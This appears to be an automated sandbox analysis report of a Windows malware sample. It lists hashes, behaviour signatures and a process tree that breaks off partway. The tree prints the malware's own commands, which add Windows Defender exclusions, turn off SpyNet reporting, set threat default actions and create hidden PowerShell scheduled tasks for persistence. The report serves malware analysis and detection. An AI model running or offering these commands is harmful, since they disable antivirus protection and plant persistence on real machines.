Analysis

  • max time kernel
    92s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/09/2022, 23:01

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    5eb69c0ca6e332148116ae0ee983244f

  • SHA1

    02db54940d2d2d8a45ee1c4a3c796784abc48c5b

  • SHA256

    fd5c05ba8b0b3565d2dc29f8f849bcaca1b7b8880a965b4a9f314b8b100d98dc

  • SHA512

    bcb4605f29468d635a80bb25bbee54e330aa2eb274d36586987f467507bc06af449e6a54dc55730950dc72d4f7e7a5786813f412d540b72307745c9d99a6b1cc

  • SSDEEP

    196608:91O6XhxFlmDesemftcv9eih+fCiUdKGsBIm0niiJbZ+nq:3OqhBoFMtziUoGIIm8iimq

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Users\Admin\AppData\Local\Temp\7zSAACB.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4144
      • C:\Users\Admin\AppData\Local\Temp\7zSAE27.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2200
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2836
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3224
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4612
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:480
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1848
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4280
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1276
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gzKJvaQCv" /SC once /ST 09:33:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:3564
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gzKJvaQCv"
                  4⤵
                    PID:1216
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gzKJvaQCv"
                    4⤵
                      PID:2628
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bGKvUxYEKJhmpNiCsB" /SC once /ST 23:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe\" G6 /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:4356
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4796
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:4404
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:1780
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:1596
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:3556
                      • C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe
                        C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe G6 /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:5060
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4884
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2340
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:3100
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:5072
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:2488
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:3472
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:3884
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:3176
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:668
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:2332
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1580
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4580
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:1264
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1100
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:2920
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:1228
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:556
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1804
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:116
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:3604
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:5036
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:4996
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:536
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:1416
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:540
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:3068
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3976
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:3564
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:4424
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:4660
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:2388
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:4340
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:2012
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:3440
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:3696
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1564
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4992
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4956
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:4476
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:5044
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:3740
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3500
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:3632
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:2284
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gpNCJFnGM" /SC once /ST 06:37:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:3600
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
